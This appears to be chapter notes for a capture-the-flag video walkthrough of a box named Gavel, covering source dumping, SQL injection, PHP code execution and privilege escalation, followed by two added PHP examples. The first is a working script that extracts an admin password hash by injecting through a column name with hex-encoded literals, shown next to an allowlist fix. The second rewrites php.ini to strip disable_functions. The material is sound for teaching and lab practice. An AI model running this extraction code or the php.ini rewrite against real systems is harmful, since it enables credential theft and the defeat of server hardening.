00:00 - Introduction
00:30 - Start of nmap
02:00 - Discovering the .git directory, using git-dumper to download the source code
05:50 - Using OpenGrep to identify vulnerabilities and discovering an SQL injection in a prepared statement
08:30 - Going over this weird SQL injection in PHP MySQL prepared statements, an odd scenario of having control over the column name in the query
11:00 - Creating the SQL injection payload for the prepared statement
18:40 - We can't use an ASCII quote, but can hex-encode the string literal to get around the limitation
23:50 - Cracking the hash and getting admin on the application
26:00 - Looking at the admin functionality, discovering rules can contain PHP, which gets us RCE
30:00 - Shell on the box
33:30 - Discovering the gavel-util and gaveld binaries, copying them to our box
36:30 - Opening the binaries up in Ghidra
41:30 - Doing some dynamic analysis on our box, running gavel-util to see what it writes to the socket
44:30 - Setting the environment variable RULE_PATH to change where gaveld loads the PHP configuration from, so we can bypass the disabled functions
50:15 - Showing another way we could exploit this: using PHP to rewrite php.ini, removing the disabled functions
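The column-name injection covered at 08:30 through 18:40, as an added example (not code from the video or from the target application). It assumes a PDO connection to a MySQL table `users(id, username, password, role)` and an endpoint that lets the client pick the column to filter on; the table name, column names and the 32-character lowercase hex hash are assumptions. The point is that a placeholder only protects the bound value: an identifier spliced into the SQL text before `prepare()` is parsed as SQL, whether or not the prepare is emulated. The payload avoids ASCII quotes entirely by writing every string literal as a MySQL hex literal (`0x61646d696e` is `'admin'`).

```php
<?php
// Added example, not the video's or the application's code.
// Assumed schema: users(id, username, password, role) on a MySQL server.

function find_user_vulnerable(PDO $pdo, string $column, string $value): array {
    // The "?" protects $value only. $column is interpolated into the SQL
    // text before the server ever sees the statement, so it is parsed as SQL.
    $stmt = $pdo->prepare("SELECT id, username, role FROM users WHERE $column = ?");
    $stmt->execute([$value]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function find_user_safe(PDO $pdo, string $column, string $value): array {
    // Identifiers cannot be bound as parameters: allowlist them, then quote.
    $allowed = ['username', 'role'];
    if (!in_array($column, $allowed, true)) {
        throw new InvalidArgumentException("column not allowed: $column");
    }
    $stmt = $pdo->prepare("SELECT id, username, role FROM users WHERE `$column` = ?");
    $stmt->execute([$value]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Boolean-based extraction of admin's password hash, one character at a time,
// through the "column" slot. No quote character appears in the payload:
// strings are MySQL hex literals, which compare as binary strings.
function leak_admin_hash(PDO $pdo, int $length = 32): string {
    $hash = '';
    for ($pos = 1; $pos <= $length; $pos++) {
        $found = false;
        foreach (str_split('0123456789abcdef') as $ch) {   // assumed lowercase hex hash
            $hexCh = bin2hex($ch);                           // 'a' -> 61, used as 0x61
            // Resulting SQL:
            //   ... WHERE (SELECT SUBSTRING(password,N,1) FROM users
            //              WHERE username=0x61646d696e)=0x?? AND 1 = ?
            // "=" binds tighter than AND, so the app's trailing "= ?" becomes
            // the harmless "1 = ?" once we bind '1' as the value.
            $column = "(SELECT SUBSTRING(password,$pos,1) FROM users"
                    . " WHERE username=0x61646d696e)=0x$hexCh AND 1";
            if (find_user_vulnerable($pdo, $column, '1') !== []) {
                $hash .= $ch;   // rows came back, so the guess was right
                $found = true;
                break;
            }
        }
        if (!$found) {
            break;              // shorter hash than assumed, or a non-hex character
        }
    }
    return $hash;
}

// Usage (connection details are assumptions). Turning emulation off forces a
// real server-side prepare and changes nothing: the injection is in the text.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=app', 'user', 'pass');
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
echo leak_admin_hash($pdo), PHP_EOL;
```

The fix is the allowlist in `find_user_safe()`: there is no way to bind an identifier, so the only defence is to refuse any column name the code did not itself enumerate. Escaping quotes would not have helped here, which is exactly why the hex-literal trick at 18:40 works.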
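The alternative shown at 50:15, rewriting php.ini from PHP to drop `disable_functions`, as an added example (not the video's or the target's code). It is generic PHP and assumes only that the running user can write the php.ini the interpreter loaded, which is the misconfiguration the technique depends on; the RULE_PATH behaviour of gaveld is not modelled here.

```php
<?php
// Added example, not the video's or the target's code.
// Comments out every active disable_functions line in the loaded php.ini.

function rewrite_php_ini(?string $iniPath = null): string {
    // php_ini_loaded_file() returns false when no php.ini is loaded at all;
    // in that case there is no disable_functions to remove either.
    $iniPath = $iniPath ?? php_ini_loaded_file();
    if ($iniPath === false || $iniPath === null) {
        throw new RuntimeException('no php.ini loaded');
    }
    if (!is_writable($iniPath)) {
        throw new RuntimeException("$iniPath is not writable");
    }
    $ini = file_get_contents($iniPath);
    // Multiline mode: ^ and $ match each line. Keep the old line as a comment.
    $patched = preg_replace('/^(\s*disable_functions\s*=.*)$/m', '; removed: $1', $ini);
    if ($patched === $ini) {
        return "no disable_functions directive in $iniPath";
    }
    if (file_put_contents($iniPath, $patched) === false) {
        throw new RuntimeException("failed to write $iniPath");
    }
    return "patched $iniPath";
}

// disable_functions is PHP_INI_SYSTEM: ini_set() cannot change it, and the
// interpreter that ran the rewrite keeps the old value. Only a freshly started
// interpreter (new CLI run, php-fpm reload, a daemon re-reading its config)
// picks up the edited file, so verify from a new process, not this one.
function disabled_functions_now(): string {
    return (string) ini_get('disable_functions');
}

echo rewrite_php_ini(), PHP_EOL;
echo 'this process still sees: ', disabled_functions_now(), PHP_EOL;
```

The caveat is the reason the RULE_PATH route at 44:30 is convenient: pointing a process at a different configuration file takes effect the next time that process starts, whereas editing the live php.ini only helps once something restarts the interpreter.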